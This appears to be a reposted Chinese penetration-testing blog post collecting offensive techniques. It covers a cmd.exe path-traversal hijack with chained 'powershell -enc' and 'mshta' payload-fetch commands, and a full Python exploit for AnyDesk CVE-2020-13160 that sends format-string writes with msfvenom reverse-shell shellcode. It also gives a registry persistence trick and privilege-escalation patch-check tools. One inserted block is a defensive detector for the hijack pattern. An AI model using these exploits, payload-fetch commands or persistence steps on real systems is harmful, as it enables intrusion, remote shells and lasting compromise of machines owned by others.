CMD Hijack & AnyDesk RCE & other

admin, 2022-03-19 06:44:23, 226 views, 2407 characters, about 8 minutes to read

From: https://hackingiscool.pl/

Full PoC command line

cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe"

Possible impact

Includes denial of service, information disclosure and arbitrary code execution (depending on the target application and system).

Take a web application as an example


Because escapeshellcmd() is used, the application is not readily vulnerable to classic command injection, so this method is used instead: escapeshellcmd() neutralises shell metacharacters, but a traversal string such as the one in the PoC above contains none, so it is passed through unchanged and Windows resolves it as a path.

A PoC


Not limited to any particular location or file


Extending this further

For example, running powershell with -enc, or mshta and similar methods; see

https://lolbas-project.github.io/. However, because of how Windows behaves, when the whole string cannot be resolved to a valid path, everything after a space is split off; the & character can be used here instead.

For example:

>cmd.exe /c "cmd /c /../../../../../../../../../../windows/system32/calc&powershell -enc xxxx"

>cmd.exe /c "cmd /c /../../../../../../../../../../windows/system32/calc&mshta http://192.168.0.105:8080/xsuUEWJ.hta"
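Added here as a defender-side check, not code from the post or from hackingiscool.pl: the helper below unpacks the string that `cmd.exe /c` actually parses, splits it on the `&` separator the post relies on, and reports any argument containing a `..` segment together with the path Windows would resolve it to. The function and indicator names are my own.

```python
import re

# A ".." path segment inside an argument: Windows normalises
# "127.0.0.1/../../windows/system32/calc.exe" to C:\windows\system32\calc.exe
# before the intended program (ping) is ever consulted.
TRAVERSAL = re.compile(r'(?:^|[\\/])\.\.(?=[\\/]|$)')

def inner_command(cmdline):
    """Return what cmd.exe /c (or /k) parses, with the outer quotes removed."""
    m = re.search(r'cmd(?:\.exe)?\s+/[ck]\s+"?(.*?)"?\s*$', cmdline, re.IGNORECASE)
    return m.group(1) if m else cmdline

def effective_target(token):
    """Path left after the last '..' segment, e.g. windows/system32/calc.exe."""
    parts = re.split(r'[\\/]', token)
    last = max(i for i, p in enumerate(parts) if p == '..')
    return '/'.join(parts[last + 1:])

def hijack_indicators(cmdline):
    """Constructed helper (not from the post): list suspicious traits of a
    cmd.exe command line. An empty list means nothing was found."""
    hits = []
    # "&" is honoured by cmd's parser even inside the quoted /c string
    segments = [s.strip() for s in inner_command(cmdline).split('&') if s.strip()]
    for n, seg in enumerate(segments):
        words = seg.split()
        if n > 0:
            # a second program chained after the hijacked first one
            hits.append('chained:' + words[0].lower())
        for tok in words[1:]:
            if TRAVERSAL.search(tok):
                hits.append('traversal:' + effective_target(tok))
    return hits
```

Ordinary relative paths such as `..\logs` also raise the traversal indicator, so allow-list known-good arguments rather than treating a hit as proof of abuse.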


AnyDesk remote code execution (CVE-2020-13160)

https://devel0pment.de/?p=1881

Generate the shellcode

msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode

Listen locally

nc -lvp 4444

EXP

#!/usr/bin/env python
# Python 2 script: str and bytes are the same type, so chr() output and
# b"" literals concatenate directly.
import struct
import socket
import sys

ip = '127.0.0.1'
port = 50001

def gen_discover_packet(ad_id, os, hn, user, inf, func):
    # Build an AnyDesk discovery datagram; each string field is length-prefixed
    d = chr(0x3e)+chr(0xd1)+chr(0x1)
    d += struct.pack('>I', ad_id)
    d += struct.pack('>I', 0)
    d += chr(0x2)+chr(os)
    d += struct.pack('>I', len(hn)) + hn
    d += struct.pack('>I', len(user)) + user
    d += struct.pack('>I', 0)
    d += struct.pack('>I', len(inf)) + inf
    d += chr(0)
    d += struct.pack('>I', len(func)) + func
    d += chr(0x2)+chr(0xc3)+chr(0x51)
    return d

# output of the msfvenom command above (bad chars \x00 \x25 \x26 excluded)
shellcode = b""
shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48"
shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\x59\x88\xc6"
shellcode += b"\x9c\x5f\xfe\x71\x38\x48\x31\x58\x27\x48\x2d"
shellcode += b"\xf8\xff\xff\xff\xe2\xf4\x33\xa1\x9e\x05\x35"
shellcode += b"\xfc\x2e\x52\x58\xd6\xc9\x99\x17\x69\x39\x81"
shellcode += b"\x5b\x88\xd7\xc0\x20\xfe\x71\x39\x08\xc0\x4f"
shellcode += b"\x7a\x35\xee\x2b\x52\x73\xd0\xc9\x99\x35\xfd"
shellcode += b"\x2f\x70\xa6\x46\xac\xbd\x07\xf1\x74\x4d\xaf"
shellcode += b"\xe2\xfd\xc4\xc6\xb6\xca\x17\x3b\xe1\xa8\xb3"
shellcode += b"\x2c\x96\x71\x6b\x11\x01\x21\xce\x08\xb6\xf8"
shellcode += b"\xde\x56\x8d\xc6\x9c\x5f\xfe\x71\x38"

print('sending payload ...')
p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%18x%165$ln'+shellcode, '\x85\xfe%18472249x%93$ln', 'ad', 'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()
print('reverse shell should connect within 5 seconds')

A persistence tip as a bonus

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\fun

Create a REG_SZ named "Command" whose value is the malicious exe, and a DWORD named "Nightly" with value 1; it is triggered every time the scheduled task starts.

Also, a 100,000-line collection of penetration testing tips

https://www.octority.com/pepenote/


Also, a Windows privilege-escalation patch lookup

https://patchchecker.com/checkprivs/

wmic qfe list full | findstr /i hotfix


Previously, patches were checked with

Windows-exploit-suggester

https://github.com/GDSSecurity/Windows-Exploit-Suggester

Wesng

https://github.com/bitsadmin/wesng


This article was first published on the WeChat public account 关注安全技术: CMD Hijack & AnyDesk RCE & other

Posted by admin; reprinted via CN-SEC: http://cn-sec.com/archives/501376.html
